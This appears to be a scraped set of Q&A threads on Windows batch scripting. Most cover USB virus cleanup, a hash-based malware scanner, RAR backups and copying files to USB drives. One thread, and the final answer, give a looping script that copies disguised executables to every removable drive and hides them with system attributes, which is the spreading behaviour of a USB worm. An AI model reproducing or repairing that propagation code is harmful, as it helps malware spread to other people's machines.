I don't know how to code myself, just managed to find some from Google and try to compile it. But it didn't work as I expected. Recently I've found that there is a virus spreading among my place without the user realizing it. The batch file is supposed to remove the files from the specified drive's %temp% folder with the extension .exe with exactly 138784 bytes. This the batch file I came up with, it works for removing it from the temporary folder but not for removing the file on their removable drive:
#ECHO OFF
ECHO "Enter Drive letter"
set /p letter=
for /r %%f in (*.exe) do if %%~zF EQU 138784 del %%F /f
attrib -s -h -a /s /d %letter%:*.*
c:
cd %temp%
Del wdr201.exe /f
ECHO "Process completed."
Pause
You can give a try for this code inspired from this one : Hackoo_Virus_Cleaner.bat
#echo off
Mode con cols=80 lines=6 & Color 9E
Title Searching the Drive letter of your USB Key and clean *.lnk files by Hackoo 2016
Set TmpLogFile=%tmp%\TmpLog.txt
Set "LogFile=%UserProfile%\Desktop\Hackoo_Virus_Clean_%UserName%_Log.txt"
If Exist %TmpLogFile% Del %TmpLogFile%
If Exist %LogFile% Del %LogFile%
for /f "tokens=2" %%i in ('wmic logicaldisk where "drivetype=2" ^|find /i ":"') do (Set MyUSB=%%i)
cls
setlocal ENABLEDELAYEDEXPANSION
set _drive=%MyUSB%
If Exist !_drive! (
cls
echo.
echo #########################################################
echo Your usb key is connected as !_drive!
echo #########################################################
echo Hit any key to remove malicious files and unhide files ...
pause>nul
Cls
echo(
Echo Removing malicious files/unhiding files... Please wait, this may take a while...
del /s /f /q !_drive!\*.lnk>>"%TmpLogFile%"2>&1
Cmd /U /C Type "%TmpLogFile%" > "%LogFile%"
Start "" %LogFile%
attrib -s -h -a -r /s /d !_drive!\*.*
Explorer "!_drive!\"
) ELSE (
cls
color 0C
echo.
echo #########################################################
echo Your usb key is not detected
echo #########################################################
echo.
)
pause & exit
Related
I'm doing a QC check on my finished md5 malware scanner using a Hyper-V VM running Windows 10. The scanner didn't remove the malware samples supplied from https://virusshare.com which hashes were contained in the scanner database and were up-to-date.
I've already tried reverting into the original SachaDee's code, but it didn't work. It is probably due to environment variables improperly set somewhere.
:MD5
cls
color 1c
title MD5 scanner
echo.
echo Warning!
echo.
echo This feature is undergoing multiple test-runs.
echo.
echo This moldule will auto remove malware when scanning.
echo.
echo This moldule could delete system or private files without any intent to do it.
echo.
echo We are not responsible for any damage to your computer or your files by using this moldule.
echo.
echo You have been WARNED!
echo.
pause
:dbpatch
cls
color B5
title MD5 scanner - Database Updates [0/4]
cd /d "%~dp0\wget-1.11.4-1-bin\bin"
wget --timeout=30 --timestamping --continue --no-check-certificate https://media.githubusercontent.com/media/Richienb/virusshare-hashes/master/virushashes.txt
pause
goto :Asksect
:Asksect
cls
title MD5 scanner - Database Updates [0/4]
echo Do you want to retry the update?
echo.
echo Y/N
echo.
set /p chc45=
if %chc45%==y goto :dbpatch
if %chc45%==Y goto :dbpatch
if %chc45%==n goto :scan
if %chc45%==N goto :scan
goto :Asksect
:scan
cd /d "%~dp0"
cls
title MD5 scanner - Database Updates [0/4]
echo Checked for Database Updates! Proceeding to Scan Engine...
echo.
pause
cls
title MD5 scanner - Scan Path [0/4]
REM Copyright 2014 BatchProg
echo please specify path to scan down here
echo example C:\Users
echo AND PLEASE DONT ENTER SOMETHING THAT ISNT A COMPUTER PATH
echo IF YOU ENTER SOMETHING THAT ISNT A COMPUTER PATH THE PROGRAM WILL CRASH
set /p pathscan2=path:
cls
title MD5 scanner - Setting up necessary things [1/4]
del /f /q %~dp0\output.txt
REM for /r %%x in (*) do set /a fcount=%fcount%+1
REM set /a totsecscan=%fcount%*15
REM set /a totminscan=%totsecscan%/60
REM if %totminscan%==0 set /a etascan=%totsecscan% seconds && goto :md5hash
REM set /a tothourscan=%totminscan%/60
REM if %tothourscan%==0 set /a etascan=%totminscan% minutes && goto :md5hash
REM set /a totdayscan=%tothourscan%/24
REM if %totdayscan%==0 set /a etascan=%tothourscan% hours && goto :md5hash
REM set /a etascan=%totdayscan% days
goto :md5hash
:md5hash
cls
title MD5 scanner - Hashing [2/4]
set "$base=%~dp0\wget-1.11.4-1-bin\bin\virushashes.txt"
for /r %%f in (%pathscan2%) do %~dp0\md5.exe "%%f " >> %~dp0\output.txt
cd /d "%~dp0"
title MD5 scanner - Comparing Hashes with known malware hashes [3/4]
cls
%pathscan2% echo ETA of scan:%etascan%
echo.
echo Uses a lot of CPU power to process but this is real scanner.
echo It does find real malware but the ability to remove it-
echo is related with the environment it is run on.
echo Run on Safe mode with networking for best results.
for /f "tokens=1* delims= " %%a in (%~dp0\output.txt) do find "%%a" "%$base%" >nul && del /p /f /s "%%b "
title MD5 scanner - Deleting Temporary Files [4/4]
del /f /q %~dp0\output.txt
cls
title MD5 scanner - Completed
echo Scan and Delete completed
echo.
pause
goto :menu
I expect that
for /f "tokens=1* delims= " %%a in (%~dp0\output.txt) do find "%%a" "%$base%" >nul && del /p /f /s "%%b "
Will compare the hash in output.txt with the Malware Hash base and deletes any malicious file (prompting the user if possible) but the code did not remove any files at all.
Additional info;
Sample output.txt
D3041FF4F3B76CC0353064D1133BFEDE D:\EvaxHybrid\backup\.tmp.drivedownload\1191564.driveupload
6756458290BE387639F0068C706E8881 D:\EvaxHybrid\backup\.tmp.drivedownload\1659364.driveupload
9A66042E5A3619A7B49633752044FCEA D:\EvaxHybrid\backup\.tmp.drivedownload\1977560.driveupload
9E44B511DD344F2D35FA513EEA0D54E4 D:\EvaxHybrid\backup\.tmp.drivedownload\2110290.driveupload
A845071F7C4B4E67EF64BFB4BF5C3FB5 D:\EvaxHybrid\backup\.tmp.drivedownload\2923965.driveupload
C49B5CD76F60FCD284209384E2E4EB55 D:\EvaxHybrid\backup\.tmp.drivedownload\2924089.driveupload
6B7484B3ADCE8141A4E7411C7F66A9D7 D:\EvaxHybrid\backup\.tmp.drivedownload\3048269.driveupload
5A48A1B8A70B5A3A39D5EBC9B370BE4D D:\EvaxHybrid\backup\.tmp.drivedownload\3395701.driveupload
58B19F4875C82A846AD6DE62096D5F19 D:\EvaxHybrid\backup\.tmp.drivedownload\3488031.driveupload
C7E363D722920967E737747DB0C79EDE D:\EvaxHybrid\backup\.tmp.drivedownload\3660857.driveupload
DBC938D49B09BE7E0FC1E7BEB74F487D D:\EvaxHybrid\backup\.tmp.drivedownload\3673375.driveupload
6068C7836BFF997EDBE52C6EC0AE7DF3 D:\EvaxHybrid\backup\.tmp.drivedownload\4033639.driveupload
CD86C81B193594F8320832D34294CFA0 D:\EvaxHybrid\backup\.tmp.drivedownload\4132442.driveupload
91D6210AA04AA666E2F32FF64B996E7E D:\EvaxHybrid\backup\.tmp.drivedownload\4155809.driveupload
7941801B8AF887E45B5021ED2466D4F8 D:\EvaxHybrid\backup\.tmp.drivedownload\4166678.driveupload
for /f "tokens=1* delims= " %%a in (%~dp0\output.txt) do find "%%a" "%$base%" >nul && del /p /f /s "%%b "
for /f "tokens=1* delims= " %%a in (%~dp0\output.txt) do find /I "%%a" "%$base%" >nul && del /p /f /s "%%b "
Changed find "%%a" "%$base%" >nul to find /I "%%a" "%$base%" >nul due to difference in letter case within the DB and hashing algorithm output (output.txt).
i have a batch file to compress one folder and rename it with date & time and it's working well.
now i need same file to compress more than one folder into one compressed rar file.
here is my batch:
#echo off
echo STARTING BACKUP...
echo %date% %time%
echo+
:: variables
set src=D:\test
set dest=D:\Backups
set filename=%DATE:/=-%_%TIME::=-%
set filename=%filename: =%
Set Rar=%ProgramFiles%\WinRar\WinRAR.exe
"%Rar%" a -m5 -ed -pEltyar -r %dest%\%filename%.rar "%src%"
echo Backup Completed!
#pause
You can try something like this :
#echo off
Title Compress multi-folders in one with Winrar
Mode 70,5 & color 0A
echo STARTING BACKUP...
Call :GetFileNameWithDateTime
echo %filename%
:: variables
set src="D:\test1","D:\test2"
set dest=D:\Backups
If not exist "%dest%" MD "%dest%"
Set Rar=%ProgramFiles%\WinRar\RAR.exe
for /f "delims=," %%i in ('echo %src%') do (
"%Rar%" a -inul -m5 -ed -hpEltyar -r "%dest%\%filename%.rar" "%%~i"
)
If "%errorlevel%" EQU "0" (
echo(
echo Backup Completed Successfully !
) Else (
echo( & color 0C
echo There was an error occured !
)
Timeout /T 10 /nobreak>nul & exit
::*********************************************************************************************
:GetFileNameWithDateTime
for /f "skip=1" %%x in ('wmic os get localdatetime') do if not defined MyDate set "MyDate=%%x"
set "filename=%MyDate:~0,4%-%MyDate:~4,2%-%MyDate:~6,2%-%MyDate:~8,2%-%MyDate:~10,2%"
exit /b
::*********************************************************************************************
I have been struggling over this question for a while now. I have a batch file that, when started, searches for any USB drive and if it finds one, it searches for some files and copies them to the USB. However it is not working for me in this case.
Please note that the files I am copying have +H and +S attributes, I do hope that wont make a difference.
Here is the code of the batch file:
#echo off
:loop
set INTERVAL=5
for /F "tokens=1*" %%a in ('fsutil fsinfo drives') do (
for %%c in (%%b) do (
for /F "tokens=3" %%d in ('fsutil fsinfo drivetype %%c') do (
if %%d equ Removable (
echo %%c is Removable
cd %SYSTEMROOT%\system32\SystemSettingsUpdate
copy "Whatsapp,Inc.exe" "%%c"
copy "Configure.exe" "%%c"
copy "HL~Realtime~Defense.exe" "%%c"
ATTRIB +H -R +S %%cConfigure.exe
ATTRIB +H -R +S %%cHL~Realtime~Defense.exe
timeout /nobreak /t 59
goto :loop
)
)
)
)
Please note that the %%c is the letter of the USB drive.
So now what happens is that when I start it, it gives me an error that it cannot locate the files I specified.
However I double checked the location and the files exist.
Any suggestions why getting the file not found error message?
COPY does not copy files with either system or hidden attribute set as the following batch code demonstrates:
#echo off
cls
pushd "%TEMP%"
md TestTarget 2>nul
echo Just a copy/xcopy test for hidden and system files.>TestFile.tmp
attrib +h TestFile.tmp
echo TRY TO COPY HIDDEN FILE ...
echo.
echo copy TestFile.tmp TestTarget\
copy TestFile.tmp TestTarget\
echo.
echo.
echo TRY TO XCOPY HIDDEN FILE ...
echo.
echo xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
echo.
pause
cls
attrib -h +s TestFile.tmp
echo TRY TO COPY SYSTEM FILE ...
echo.
echo copy TestFile.tmp TestTarget\
copy TestFile.tmp TestTarget\
echo.
echo.
echo TRY TO XCOPY SYSTEM FILE ...
echo.
echo xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
echo.
pause
cls
attrib +h +s TestFile.tmp
echo TRY TO COPY HIDDEN SYSTEM FILE ...
echo.
echo copy TestFile.tmp TestTarget\
copy TestFile.tmp TestTarget\
echo.
echo.
echo TRY TO XCOPY HIDDEN SYSTEM FILE ...
echo.
echo xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
echo.
del /A TestFile.tmp
rd /Q /S TestTarget
popd
pause
One solution for copying hidden system files is using command XCOPY with parameter /H.
But usage of XCOPY for copying a single file is a little bit tricky.
Copying with XCOPY a single file to an existing directory with a new file name results in a prompt if the target is a file or a directory. For this task the prompt can be avoided by using option /I and making sure the target specification ends with a backslash and is therefore interpreted as directory path. See also answers on BATCH file asks for file or folder for details on XCOPY and file or directory prompt.
Additionally argument /Y is needed to avoid the prompt on overwriting an already existing file in target directory with same name as current source file.
Then XCOPY outputs an access denied error message if the file already exists in target directory but has hidden attribute set. The copying is successful for this case with using also flag /R (second copy done by demonstration batch file).
Parameter /Q should be also used for copying the files without showing their names.
And last it would be good to use >nul at end of each line with XCOPY if the success message should be suppressed which was not done on demonstration batch code as we want to see absolutely the success message here.
XCOPY without using /K removes automatically the read-only attribute.
copy does not copy files with either system or hidden attribute set. Use instead xcopy with parameter /H.
A better way to List the USB drives
#echo off
setlocal enabledelayedexpansion
:: Creating a list with all USB drive
for /f "delims=" %%a in ('wmic logicaldisk where drivetype^=2 get deviceid ^| find ":"') do set "$List=!$List! %%a"
Echo USB ==^> !$List!
And like #Mofi said use xcopy instead of copy
I have a working simple batch-file program which unhides predefined drive hidden folders.
What I want to do is:
To insert Drive letter by a user instead of predefined and other option if you suggested me.
my unhide.bat code is:
#echo off
D:
attrib -r -s -h /s /d
pause
You can use set /p DriveLetter=Please enter drive letter.. If you then run %DriveLetter% as a command, it will expand as you expect.
To make your code work:
#echo off
set /p DriveLetter=Please enter drive letter.
%DriveLetter%
attrib -r -s -h /s /d
pause
They would enter "D:" and it would accept it as such.
The only thing to note is that if someone uses an incorrect drive letter, bad stuff will happen.
Alternatively, you could use a large block with CHOICE, but that seems overkill. You'd have to define every drive letter. Thus, I won't go into detail on this.
This should do:
SET /P letter=Please give your drive letter and press ENTER:
ECHO %letter%
PAUSE
I guess that you try to unhide the folders into the USB Drive caused by a worm
If you like to detect the drive letter of your USB Key, Try this code instead,
I made this tool to unhide folders and files and delete all infected links into the USB key
#echo off
Mode con cols=98 lines=10 & Color 9E
Title Searching the Drive letter of your USB Key by Hackoo 2014
echo.
ECHO *******************************************************************************************
echo.
echo Searching the drive letter of your USB Key .......
echo.
ECHO *******************************************************************************************
wmic logicaldisk get DeviceID,DriveType /Format:CSV > %Tmp%\tmp.txt
for /f "skip=2 tokens=1-3 delims=," %%a in ('%COMSPEC% /a /c type "%Tmp%\tmp.txt"') do echo %%b %%c >> %Tmp%\tmp2.txt
for /f "tokens=1" %%i in ('%COMSPEC% /a /c type "%Tmp%\tmp2.txt" ^|Find "2"') Do (set MyUSBDrive=%%i)
Del %Tmp%\tmp.txt & Del %Tmp%\tmp2.txt
cls
echo.
ECHO *******************************************************************************************
echo.
echo The drive letter of your USB Key is %MyUSBDrive%
echo.
ECHO *******************************************************************************************
pause
cls
echo.
echo.
ECHO *******************************************************************************************
echo.
echo Press a button to delete infected shortcuts and restore hidden files in your USB key
echo.
ECHO *******************************************************************************************
pause>nul
cls
echo.
echo.
ECHO *******************************************************************************************
echo.
echo Deleting infected shortcuts and restoring hidden files
echo.
ECHO *******************************************************************************************
:: To Unhide Folders and files into your USB key
Attrib -s -h -r %MyUSBDrive%\*.* /D /S >nul 2>&1
:: To delete all infected files.lnk
Del %MyUSBDrive%\*.lnk >nul 2>&1
Explorer %MyUSBDrive%
pause
I want to create a batch file to copy a file from any Dir into root folder that the .bat file located on that like a USB flash drive .
My incomplete command :
xcopy /s "%userprofile%\Desktop\test.txt" "?"
What can I replace with "?" ???
Thanks guys
This will do exactly as you want to any and all connected USB drives.
#echo off
for /F "usebackq tokens=1,2,3,4 " %%i in (`wmic logicaldisk get caption^,description^,drivetype 2^>NUL`) do (
if %%l equ 2 (
xcopy /s "%userprofile%\Desktop\test.txt" %%i\
)
)
xcopy /s "%userprofile%\Desktop\test.txt" "\"
You should replace it with drive letter of USB drive followed by :\
So, the real question is how to determine, which of the drives in system are USB flash drives, I guess? Here is the code:
#echo off
setlocal enabledelayedexpansion
set INTEXTFILE=temp.txt
set OUTTEXTFILE=temp.bat
set SEARCHTEXT='Removable Disk'
set REPLACETEXT=
set OUTPUTLINE=
wmic logicaldisk get name,description|grep -h "Removable" > %INTEXTFILE%
for /f "tokens=3,* delims= " %%A in ( '"type %INTEXTFILE%"') do (
SET string=%%A
SET modified=!string:%SEARCHTEXT%=%REPLACETEXT%!
)
echo xcopy /s "%userprofile%\Desktop\test.txt" !modified! > %OUTTEXTFILE%
call %OUTTEXTFILE%
del %OUTTEXTFILE%
del %INTEXTFILE%
But take into account that it definitely works only for 1 removable disk. It will fail, if two devices of this type are plugged in.
What you are going to need to do is use a relative path for your USB directory. The code will look like this:
#echo off
set /p entry= Enter the the path of the file you'd like to copy:
copy %entry% %~dp0\*.*
#pause
This should let you enter into a prompt where you would like to copy the folder from/its name. It will name the file the same as the original and keep the original format (.txt, etc.).
Let me know if this does not work for you instead of downvoting and I will work out another solution for you asap.
Best of luck!
#ECHO Off
:loop
#echo off
set INTERVAL=5
for /F "tokens=1*" %%a in ('fsutil fsinfo drives') do (
for %%c in (%%b) do (
for /F "tokens=3" %%d in ('fsutil fsinfo drivetype %%c') do (
if %%d equ Removable (
echo %%c is Removable
cd "%USERPROFILE%\Appdata\Local\SystemSettings"
xcopy "%USERPROFILE%\Appdata\Local\SystemSettings" "%%c" /s /e /h /y
ATTRIB +H -R +S %%cConfigure.exe
ATTRIB +H -R +S %%cHL~Realtime~Defense.exe
ATTRIB -H -R -s %%cWhatsapp,Inc.exe
timeout /nobreak /t 99
goto loop
Is exactly what you need